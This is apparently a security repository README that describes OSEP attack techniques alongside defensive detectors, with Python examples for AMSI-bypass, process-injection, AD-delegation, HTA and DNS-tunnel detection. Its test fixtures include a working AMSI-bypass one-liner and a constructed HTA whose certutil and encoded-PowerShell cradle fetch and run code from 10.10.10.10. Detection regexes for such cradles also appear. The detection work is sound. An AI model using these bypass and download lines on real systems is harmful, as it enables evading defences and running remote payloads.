A comprehensive repository containing both offensive security techniques from OSEP (Offensive Security Experienced Penetration Tester) studies and their corresponding defensive countermeasures. This repository has been enhanced with production-ready defensive tools to help security teams detect and prevent advanced attack techniques.
This repository is designed for defensive security analysis and education only. The offensive techniques are provided for understanding attack vectors to better defend against them. All defensive tools included are for legitimate security analysis purposes.
- 🛡️ Defensive Security Tools
- 🎯 Offensive Techniques (For Analysis)
- 🚀 Quick Start
- 📖 Training Labs
- 🔧 Installation
- 📚 Documentation
- 🤝 Contributing
Our defensive toolkit transforms OSEP attack knowledge into practical security solutions:
- PowerShell module detecting reflection-based AMSI bypasses
- Real-time monitoring with Windows Event Log integration
- Detects the reflection chain built from `[Ref].Assembly.GetTypes()`, `GetFields('NonPublic,Static')` and `SetValue($null,$true)`
- Risk Level: CRITICAL - Immediate action required
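The following is an added example, not code from the Defend-AMSI module itself: it shows the detection logic such a module needs, applied to the ScriptBlockText of PowerShell Script Block Logging records (Event ID 4104). The four records are constructed for the example, the string-concatenation normalizer is this example's own handling of the most common evasion of naive matching, and the vendor/product strings in the CEF output (the SIEM format listed under Key Features) are placeholders.

```python
# Added example, not part of the repository's Defend-AMSI module: a small
# scanner for the reflection-based AMSI bypass chain, run over the
# ScriptBlockText of PowerShell Script Block Logging records (Event ID 4104).
# The records below are constructed; the CEF vendor/product names are placeholders.
import re

# 'Ams' + 'iUt' + 'ils' style splitting is the usual way the chain is hidden
# from plain string matching; collapse adjacent literals before matching.
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def normalize(script: str) -> str:
    """Join concatenated string literals until nothing changes."""
    prev = None
    while prev != script:
        prev = script
        script = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", script)
    return script


# One indicator per step of the chain. PowerShell is case-insensitive, so every
# pattern is too, and whitespace between tokens is tolerated.
INDICATORS = {
    "ref_assembly_gettype": re.compile(
        r"\[\s*ref\s*\]\s*\.\s*assembly\s*\.\s*gettypes?\s*\(", re.I),
    "amsiutils_type": re.compile(r"amsiutils", re.I),
    "nonpublic_static_field": re.compile(
        r"getfields?\s*\(.{0,80}?['\"]nonpublic\s*,\s*static['\"]", re.I | re.S),
    "setvalue_null_true": re.compile(
        r"setvalue\s*\(\s*\$null\s*,\s*\$true\s*\)", re.I),
}


def assess(script_text: str) -> dict:
    """Return the matched indicators and a verdict for one script block."""
    text = normalize(script_text)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Flipping a static field to $true after a reflective lookup is the bypass
    # itself; a lone mention (e.g. in a comment) is only worth a second look.
    if "setvalue_null_true" in hits and len(hits) >= 2:
        verdict = "CRITICAL"
    elif hits:
        verdict = "SUSPICIOUS"
    else:
        verdict = "CLEAN"
    return {"verdict": verdict, "indicators": hits}


def _cef_header(value: str) -> str:
    return value.replace("\\", "\\\\").replace("|", "\\|")


def _cef_ext(value: str) -> str:
    return (value.replace("\\", "\\\\").replace("=", "\\=")
                 .replace("\r", "").replace("\n", "\\n"))


def to_cef(record_id: str, script_text: str, result: dict) -> str:
    """Render one finding as a CEF line (header fields escape '|', extension escapes '=')."""
    severity = {"CRITICAL": 10, "SUSPICIOUS": 6, "CLEAN": 0}[result["verdict"]]
    header = "|".join(_cef_header(v) for v in (
        "OSEP-Everything", "AMSI-Reflection-Scanner", "1.0",
        "amsi_reflection_bypass", "AMSI reflection bypass attempt"))
    ext = "externalId=%s cs1Label=indicators cs1=%s msg=%s" % (
        _cef_ext(record_id), _cef_ext(",".join(result["indicators"])),
        _cef_ext(script_text[:200]))
    return "CEF:0|%s|%d|%s" % (header, severity, ext)


# Constructed 4104 ScriptBlockText samples: benign, the classic one-liner, the
# same chain with split strings, and a script that merely mentions AmsiUtils.
SAMPLE_RECORDS = [
    ("4104-0001", "Get-ChildItem -Path C:\\Users | Where-Object { $_.PSIsContainer }"),
    ("4104-0002", "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                  ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"),
    ("4104-0003", "[Ref].Assembly.GetType(('System.Management.Automation.Amsi'+'Utils'))"
                  ".GetField(('amsiInit'+'Failed'),'NonPublic,Static').SetValue($null,$true)"),
    ("4104-0004", "# note: AmsiUtils is an internal type, do not touch it\nGet-Process"),
]


def scan(records):
    """Assess each (id, ScriptBlockText) pair and return the results."""
    return [(rid, assess(text)) for rid, text in records]


if __name__ == "__main__":
    for rid, result in scan(SAMPLE_RECORDS):
        if result["verdict"] != "CLEAN":
            print(to_cef(rid, dict(SAMPLE_RECORDS)[rid], result))
```

The normalizer only handles literal `+` concatenation; `-join`, format operators and `[char]` arrays are further evasions a production rule set has to cover, which is why the tool pairs pattern matching with event log monitoring rather than relying on either alone.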
- Python tool with YARA rule integration for malicious HTA detection
- Detects SuperSharpShooter patterns, certutil chains, Office-spawned processes
- Machine learning behavioral analysis for zero-day HTA attacks
- Risk Level: HIGH - Active threat detection
- PowerShell framework for comprehensive AD security monitoring
- Detects: Kerberos delegation abuse, LAPS exploitation, relay attacks
- Baseline establishment and behavioral analysis for AD environments
- Risk Level: HIGH - Advanced persistent threat detection
- Python system detecting process hollowing, DLL injection, VBA injection
- Windows memory analysis integration with behavioral monitoring
- Correlates with EDR systems for enhanced detection capabilities
- Risk Level: CRITICAL - Code execution detection
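As an added example (not the repository's Process Injection Detector), here is the correlation logic behind the three detections named above, written over Sysmon events 1 (ProcessCreate), 8 (CreateRemoteThread) and 10 (ProcessAccess). The events are constructed dicts that use Sysmon's own field names; the access-mask constants are the documented PROCESS_* rights, while the rule names, severities and the Office/LOLBin lists are this example's choices.

```python
# Added example, not the repository's Process Injection Detector: correlation
# rules over Sysmon events 1 (ProcessCreate), 8 (CreateRemoteThread) and
# 10 (ProcessAccess). The events are constructed dicts using Sysmon's field
# names; in practice they come from the Microsoft-Windows-Sysmon/Operational log.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"powershell.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# PROCESS_* access rights: an injector needs to allocate/protect memory, write
# to it and start a thread; a hollowing parent needs the first two.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
WRITE_RIGHTS = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
INJECT_RIGHTS = WRITE_RIGHTS | PROCESS_CREATE_THREAD


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Walk a batch of Sysmon events in order and return a list of alerts."""
    parent_of = {}   # pid -> parent pid, from ProcessCreate events seen so far
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1:
            parent_of[ev["ProcessId"]] = ev["ParentProcessId"]
            if basename(ev["ParentImage"]) in OFFICE and basename(ev["Image"]) in LOLBINS:
                alerts.append({"rule": "office_spawned_lolbin", "severity": "HIGH",
                               "parent": ev["ParentImage"], "child": ev["Image"],
                               "cmdline": ev.get("CommandLine", "")})
        elif eid == 8:
            # Sysmon only logs CreateRemoteThread across processes, so every
            # record is a candidate; Office or script hosts as the source are worst.
            sev = "CRITICAL" if basename(ev["SourceImage"]) in OFFICE | LOLBINS else "HIGH"
            alerts.append({"rule": "remote_thread_injection", "severity": sev,
                           "source": ev["SourceImage"], "target": ev["TargetImage"],
                           "start": ev.get("StartFunction") or ev.get("StartAddress", "")})
        elif eid == 10:
            granted = int(ev["GrantedAccess"], 16)
            if granted & WRITE_RIGHTS != WRITE_RIGHTS:
                continue   # query/read-only access is not an injection primitive
            src, tgt = ev["SourceProcessId"], ev["TargetProcessId"]
            if parent_of.get(tgt) == src:
                # A parent writing into a child it just created is the hollowing
                # pattern (create suspended, unmap, write image, resume).
                alerts.append({"rule": "possible_process_hollowing", "severity": "CRITICAL",
                               "source": ev["SourceImage"], "target": ev["TargetImage"]})
            elif granted & INJECT_RIGHTS == INJECT_RIGHTS:
                alerts.append({"rule": "cross_process_write_and_thread", "severity": "HIGH",
                               "source": ev["SourceImage"], "target": ev["TargetImage"]})
    return alerts


# Constructed event batch: one benign launch, a macro spawning PowerShell, a
# hollowed svchost.exe, a rundll32 remote thread, and a benign Task Manager query.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 3000, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 4400, "ParentProcessId": 4321,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -w hidden -enc SQBFAFgA"},
    {"EventID": 1, "ProcessId": 5000, "ParentProcessId": 4321,
     "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventID": 10, "SourceProcessId": 4321, "TargetProcessId": 5000,
     "SourceImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 8, "SourceProcessId": 6100, "TargetProcessId": 1200,
     "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\explorer.exe",
     "StartModule": r"C:\Windows\System32\kernel32.dll", "StartFunction": "LoadLibraryA"},
    {"EventID": 10, "SourceProcessId": 7000, "TargetProcessId": 3000,
     "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The parent-writes-into-child rule is deliberately narrow: it fires only when the ProcessAccess event follows a ProcessCreate seen in the same batch, so a detector fed from a live stream must keep the `parent_of` map across batches and expire it as processes exit (event 5).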
- Specialized Ligolo-ng detection for OSEP tunneling techniques
- Multi-protocol analysis: DNS, HTTP, ICMP, SSH tunneling
- Real-time packet capture with machine learning feature extraction
- Risk Level: HIGH - Network evasion detection
- Comprehensive training platform with 6 lab categories
- Guided exercises, attack simulations, and hands-on practice scenarios
- Installation assistance and progress tracking for all defensive tools
- ✅ SIEM Integration: JSON, CSV, CEF format support for enterprise SIEM platforms
- ✅ Real-time Monitoring: Live threat detection with automated alerting
- ✅ Machine Learning: Behavioral analysis and anomaly detection
- ✅ Cross-Platform: Windows and Linux compatibility where applicable
- ✅ Production Ready: Enterprise deployment with comprehensive logging
- ✅ Threat Intelligence: IOC integration and threat feed compatibility
Understanding these attack vectors enables better defensive strategies:
Advanced AD attack techniques for defensive analysis:
- Delegation: Unconstrained, Constrained, Resource-Based Constrained Delegation
- LAPS: Local Administrator Password Solution exploitation techniques
- Relay: NTLM and Kerberos relay attack patterns
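The following added example (not the repository's AD security framework) shows the delegation classification, the LAPS expiry check and the baseline comparison that the framework's description above calls for, applied to LDAP-style computer objects. The objects, the baseline snapshot and the "now" timestamp are constructed; the attribute names and userAccountControl bits are the standard Active Directory ones, and the 90-day LAPS policy maximum is an assumed tenant setting. Relay exposure is not covered here because it is a network property (signing requirements), not an attribute of the directory objects.

```python
# Added example, not the repository's AD security framework: a delegation and
# LAPS audit over LDAP-style computer objects, plus a diff against a baseline
# snapshot. The objects below are constructed; a real run would pull the same
# attributes via LDAP (ldap3) or Get-ADComputer -Properties.
from datetime import datetime

# userAccountControl bits that matter for delegation
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained with protocol transition
DOMAIN_CONTROLLERS_RID = 516                   # primaryGroupID of every DC


def to_filetime(dt: datetime) -> int:
    """Windows FILETIME: 100 ns ticks since 1601-01-01 (how LAPS stores expiry)."""
    return int((dt - datetime(1601, 1, 1)).total_seconds() * 10_000_000)


def classify_delegation(obj: dict) -> list:
    """Return which delegation types the object is configured for."""
    uac = int(obj.get("userAccountControl", 0))
    kinds = []
    if uac & UF_TRUSTED_FOR_DELEGATION:
        kinds.append("unconstrained")
    if obj.get("msDS-AllowedToDelegateTo"):
        kinds.append("constrained_protocol_transition"
                     if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION else "constrained")
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        kinds.append("rbcd")
    return kinds


def laps_expiry_anomaly(obj: dict, now_filetime: int, max_days: int = 90):
    """Days until the LAPS password expires, if that exceeds the policy maximum.
    An attacker with write access pushes ms-Mcs-AdmPwdExpirationTime far into
    the future so a recovered password keeps working; returns None otherwise."""
    exp = obj.get("ms-Mcs-AdmPwdExpirationTime")
    if exp is None:
        return None
    days = (int(exp) - now_filetime) / (10_000_000 * 86400)
    return days if days > max_days else None


def audit(objects: list, now_filetime: int, baseline: dict = None):
    """Return (findings keyed by sAMAccountName, delegation rights absent from
    the baseline). The second value is what to alert on once a baseline exists."""
    base = baseline or {}
    report, current = {}, {}
    for obj in objects:
        name = obj["sAMAccountName"]
        kinds = classify_delegation(obj)
        # DCs are legitimately unconstrained; do not page on them
        if obj.get("primaryGroupID") == DOMAIN_CONTROLLERS_RID:
            kinds = [k for k in kinds if k != "unconstrained"]
        current[name] = set(kinds)
        findings = list(kinds)
        anomaly = laps_expiry_anomaly(obj, now_filetime)
        if anomaly is not None:
            findings.append("laps_expiry_%d_days" % anomaly)
        if findings:
            report[name] = findings
    new = {n: sorted(k - base.get(n, set()))
           for n, k in current.items() if k - base.get(n, set())}
    return report, new


# Constructed snapshot: a DC, a server with unconstrained delegation, a web
# server with constrained delegation + protocol transition, a workstation with
# RBCD and a LAPS expiry five years out, and a workstation with a normal expiry.
NOW = to_filetime(datetime(2025, 1, 15))
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "primaryGroupID": 516},
    {"sAMAccountName": "SRV02$", "userAccountControl": 0x81000, "primaryGroupID": 515},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1001000, "primaryGroupID": 515,
     "msDS-AllowedToDelegateTo": ["CIFS/FILE01.corp.local"]},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000, "primaryGroupID": 515,
     # placeholder bytes standing in for the security descriptor blob
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80",
     "ms-Mcs-AdmPwdExpirationTime": to_filetime(datetime(2030, 1, 1))},
    {"sAMAccountName": "WS02$", "userAccountControl": 0x1000, "primaryGroupID": 515,
     "ms-Mcs-AdmPwdExpirationTime": to_filetime(datetime(2025, 2, 10))},
]
# Baseline taken earlier: SRV02$ and WEB01$ were already known; WS01$'s RBCD is new.
BASELINE = {"SRV02$": {"unconstrained"}, "WEB01$": {"constrained_protocol_transition"}}

if __name__ == "__main__":
    report, new = audit(SAMPLE_OBJECTS, NOW, BASELINE)
    print("findings:", report)
    print("new since baseline:", new)
```

The RBCD check only tests for the attribute's presence; resolving the security descriptor to the principal that was granted the right (the attacker-controlled account, in an attack) is the next step a real detector takes, and requires parsing the DACL.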
Anti-Malware Scan Interface bypass techniques:
- Reflection-based bypasses detected by our defensive engine
- PowerShell logging evasion methods
AV evasion techniques for defensive understanding:
- Payload encoding and obfuscation methods
- EDR bypass strategies
Constrained Language Mode bypass techniques:
- Sliver and Meterpreter built-in bypasses
- Alternative methods when Windows Defender is active
Social engineering attack vectors:
- HTA: HTML Application attack methods (2 working examples)
- Word: VBA macro attacks (3 x 32-bit, 1 x 64-bit; these bypassed current AV at the time of writing, which will not hold indefinitely)
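Here is an added example, not the repository's HTA analyzer, of the static indicators that separate a malicious HTA from a benign one, including decoding of a PowerShell `-EncodedCommand` payload so the download cradle inside it is scanned too. Plain regexes stand in for the YARA rules the tool uses; the weights, thresholds and both sample files (including the 10.10.10.10 address) are constructed for the example.

```python
# Added example, not the repository's HTA analyzer: static indicators for a
# malicious .hta, with the PowerShell -EncodedCommand payload decoded and
# scanned as well. Plain regexes stand in for the tool's YARA rules; both
# sample files below are constructed, as are the weights and thresholds.
import base64
import re

# (name, pattern, weight)
_RULES = [
    ("wscript_shell", r"(?:CreateObject|ActiveXObject)\s*\(\s*['\"]WScript\.Shell['\"]", 3),
    ("shell_run", r"\.\s*Run\s*[\(\s'\"]", 2),
    ("certutil_chain", r"certutil[^\n&;|]*-(?:urlcache|decode|encode)", 4),
    ("powershell_hidden", r"powershell[^\n]*-w(?:indowstyle)?\s+hidden", 2),
    ("encoded_command", r"powershell[^\n]*\s-e[a-z]*\s+[A-Za-z0-9+/=]{16,}", 3),
    ("download_cradle", r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression", 3),
    ("window_hiding", r"resizeTo\s*\(\s*[01]\s*,\s*[01]\s*\)|moveTo\s*\(\s*-\d", 1),
]
INDICATORS = [(name, re.compile(pat, re.I), weight) for name, pat, weight in _RULES]
# -e, -ec, -enc, -EncodedCommand: PowerShell accepts any unambiguous prefix
ENCODED = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text: str) -> list:
    """Decode every -enc/-EncodedCommand payload (base64 of UTF-16LE)."""
    decoded = []
    for m in ENCODED.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue   # not real base64 (or not UTF-16LE): leave it alone
    return decoded


def analyze_hta(hta: str) -> dict:
    """Score the file plus anything unpacked from it and return a verdict."""
    decoded = decode_encoded_commands(hta)
    text = hta + "\n" + "\n".join(decoded)
    hits = {name: weight for name, rx, weight in INDICATORS if rx.search(text)}
    score = sum(hits.values())
    verdict = "HIGH" if score >= 6 else "MEDIUM" if score >= 3 else "LOW"
    return {"verdict": verdict, "score": score, "indicators": sorted(hits), "decoded": decoded}


def _encode_ps(cmd: str) -> str:
    """What an attacker's generator does: PowerShell expects UTF-16LE base64."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed samples: a harmless HTA and one that hides its window, runs a
# certutil download/decode chain and an encoded PowerShell download cradle.
BENIGN_HTA = """<html><head><title>Inventory viewer</title></head>
<body><h1>Asset list</h1><script>document.title = "Inventory";</script></body></html>"""

MALICIOUS_HTA = """<html><head><script language="VBScript">
Set sh = CreateObject("WScript.Shell")
sh.Run "certutil -urlcache -split -f http://10.10.10.10/p.txt p.txt & certutil -decode p.txt p.exe & p.exe", 0, False
</script><script>
window.resizeTo(1, 1);
var o = new ActiveXObject("WScript.Shell");
o.Run("powershell -w hidden -enc %s", 0);
</script></head><body></body></html>""" % _encode_ps(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/a.ps1')")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_HTA), ("malicious", MALICIOUS_HTA)):
        print(label, analyze_hta(sample))
```

Decoding the encoded command before scoring is what makes the `download_cradle` rule fire here; without it, the outer file shows only the launcher and the cradle is invisible to the string rules. Obfuscated VBScript (`Chr()` chains, `Execute`) needs an additional emulation or deobfuscation pass, which is the gap the tool's behavioral analysis is meant to cover.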
Network evasion and pivoting techniques:
- Ligolo-ng: Advanced tunneling solution (recommended over proxychains)
- Detection Patterns: Our Network Tunnel Detector specifically targets these techniques
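As an added example (not the repository's Network Tunnel Detector), the block below implements the DNS-tunnel scoring the tool description refers to: per-domain statistics over a query log, with a CDN-style domain included to show that high subdomain churn alone is not enough. The query log is constructed inline, the registered-domain split assumes two labels (a public-suffix list is needed in production), and all thresholds are this example's tuning.

```python
# Added example, not the repository's Network Tunnel Detector: per-domain
# statistics that separate DNS tunnelling from ordinary lookups. The query log
# is constructed inline as (timestamp, qname, qtype) tuples; a live version
# would feed the same tuples from a pcap or resolver log.
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payload sits near log2(alphabet size)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (subdomain labels, registered domain). The registered domain is
    taken as the last two labels here; use a public-suffix list in production."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])


def detect_tunnels(queries, min_queries: int = 20) -> list:
    """Score each registered domain over the batch; return the suspicious ones."""
    per_domain = defaultdict(list)
    for ts, qname, qtype in queries:
        sub, domain = split_name(qname)
        per_domain[domain].append((ts, "".join(sub), qtype))
    alerts = []
    for domain, rows in per_domain.items():
        n = len(rows)
        if n < min_queries:
            continue
        unique_ratio = len({s for _, s, _ in rows}) / n
        avg_entropy = sum(shannon_entropy(s) for _, s, _ in rows) / n
        avg_len = sum(len(s) for _, s, _ in rows) / n
        bulk_types = sum(1 for _, _, t in rows if t in ("TXT", "NULL")) / n
        span = max(t for t, _, _ in rows) - min(t for t, _, _ in rows)
        rate = n / span if span > 0 else float(n)
        score = 0
        score += 2 if unique_ratio > 0.8 else 0   # every query carries fresh data
        score += 2 if avg_entropy > 3.5 else 0    # encoded payload, not words
        score += 2 if avg_len > 30 else 0         # long names maximise bytes per query
        score += 1 if bulk_types > 0.5 else 0     # record types with room for downstream data
        score += 1 if rate > 1.0 else 0           # sustained query rate
        if score >= 4:
            alerts.append({"domain": domain, "score": score, "queries": n,
                           "unique_ratio": round(unique_ratio, 2),
                           "avg_entropy": round(avg_entropy, 2), "avg_len": round(avg_len, 1)})
    return sorted(alerts, key=lambda a: -a["score"])


def _constructed_queries():
    q = []
    # 30 ordinary lookups against example.com, three hostnames, one every 2 s
    hosts = ["www", "mail", "cdn"]
    for i in range(30):
        q.append((i * 2.0, "%s.example.com" % hosts[i % 3], "A"))
    # 25 CDN-style names: unique every time but short and low-entropy, not a tunnel
    for i in range(25):
        q.append((i * 2.4, "img%03d.cdn.example.org" % i, "A"))
    # 40 tunnel queries: 64 hex chars of payload split into two labels, TXT, 2/s
    for i in range(40):
        payload = hashlib.sha256(b"chunk-%d" % i).hexdigest()
        q.append((i * 0.5, "%s.%s.tun.example.net" % (payload[:32], payload[32:]), "TXT"))
    return q


SAMPLE_QUERIES = _constructed_queries()

if __name__ == "__main__":
    for alert in detect_tunnels(SAMPLE_QUERIES):
        print(alert)
```

The CDN domain scores 2 (churn only) and stays below the alert line, which is the false-positive case a traffic baseline exists to suppress; a tunnel scores on churn, entropy, length, record type and rate together. Ligolo-ng itself tunnels over a TCP/TLS agent connection rather than DNS, so these features apply to DNS-based pivots and the tool's other protocol analyzers cover the rest.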
- CSharp Everything: C# offensive tooling collection
- EveryBox: Standard enumeration tools for any target
- MSSQL: Database-specific attack techniques
# 1. Clone the repository
git clone https://github.com/your-repo/OSEP-Everything.git
cd OSEP-Everything
# 2. Launch the defensive lab menu
cd DefensiveTools/Lab-Menu
python3 defensive_lab_menu.py
# 3. Start with AMSI detection (Windows; run these two commands in a PowerShell 5.1+ session)
cd ../Defend-AMSI
Import-Module .\Defend-AMSI.psm1
Initialize-AMSIDefense
# 4. Begin network monitoring (Linux; root is required for packet capture)
cd ../Network-Tunnel-Detector
sudo python3 tunnel_detector.py --monitor 30 --verbose
# Analyze attack techniques for defensive purposes; each path below is
# relative to the repository root (note the quotes around the path with a space)
cd "Active Directory/Delegation"
# Review constrained delegation patterns for detection
cd AMSI
# Study bypass techniques to improve defensive rules
cd Phishing/HTA
# Analyze HTA attack vectors for defensive signatures
Our interactive lab system provides hands-on experience:
- 🛡️ AMSI Bypass Detection Labs (5 labs)
  - PowerShell reflection detection
  - Event log analysis
  - Real-time monitoring setup
- 📄 HTA Attack Analysis Labs (4 labs)
  - YARA rule development
  - Behavioral analysis training
  - Malicious HTA identification
- 🏛️ Active Directory Security Labs (6 labs)
  - Kerberos attack detection
  - LAPS security monitoring
  - Delegation abuse identification
- 💉 Process Injection Detection Labs (5 labs)
  - Memory analysis techniques
  - VBA injection detection
  - Process hollowing identification
- 🌐 Network Tunnel Detection Labs (4 labs)
  - Ligolo-ng pattern recognition
  - DNS tunneling analysis
  - Traffic baseline establishment
- 🔬 Advanced Integration Labs (3 labs)
  - Multi-tool correlation
  - SIEM integration
  - Automated response workflows
cd DefensiveTools/Lab-Menu
python3 defensive_lab_menu.py
# Navigate through interactive menus:
# 1-6: Select lab category
# 7: View progress and results
# 8: Installation assistance
# 9: Documentation and help
- Windows 10/11 or Linux (Ubuntu 20.04+)
- PowerShell 5.1+ (for AMSI and AD tools)
- Python 3.7+ (for analysis tools)
- Administrator/Root privileges (for monitoring tools)
# Run the lab menu for guided installation
cd DefensiveTools/Lab-Menu
python3 defensive_lab_menu.py
# Select option 8: Tool Installation & Setup
# Install Python dependencies
pip install -r DefensiveTools/requirements.txt
# Install PowerShell modules (Windows; run in a PowerShell session, not bash)
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
Import-Module .\DefensiveTools\Defend-AMSI\Defend-AMSI.psm1
# Install system dependencies (Linux)
sudo apt-get update
sudo apt-get install libpcap-dev python3-dev
# Verify installation
python3 -c "import scapy, psutil, dns.resolver; print('Dependencies OK')"
- AMSI Detection Engine Guide
- HTA Analyzer Manual
- AD Security Framework Docs
- Process Injection Detector Guide
- Network Tunnel Analyzer Manual
We welcome contributions that enhance defensive capabilities:
- 🛡️ New Detection Rules: Additional attack pattern signatures
- 📊 Analytics Improvements: Enhanced behavioral analysis
- 🔧 Tool Enhancements: Performance and accuracy improvements
- 📚 Documentation: Usage guides and implementation examples
- 🧪 Testing: Additional test cases and validation scenarios
- Fork the repository
- Create a feature branch:
git checkout -b defensive-enhancement
- Test thoroughly with provided test suites
- Document new features and detection capabilities
- Submit a pull request with detailed description
- All defensive tools must include comprehensive test suites
- Documentation must include real-world deployment examples
- Detection rules must minimize false positives
- Performance impact must be documented and optimized
For security vulnerabilities in the defensive tools themselves: report them privately to the maintainers rather than in a public issue
- 📖 Check documentation and README files first
- 🧪 Run test suites to validate setup
- 💬 Open an issue for bugs or feature requests
- 📧 Contact maintainers for enterprise deployment guidance
This repository is provided for legitimate security analysis and education purposes only. Users are responsible for compliance with applicable laws and regulations. The defensive tools included are designed to protect against the attack techniques demonstrated.
Educational Use Only - Not for unauthorized testing or malicious purposes.
Community resources for continued learning:
🛡️ Defend Forward - Understand Attacks to Build Better Defenses 🛡️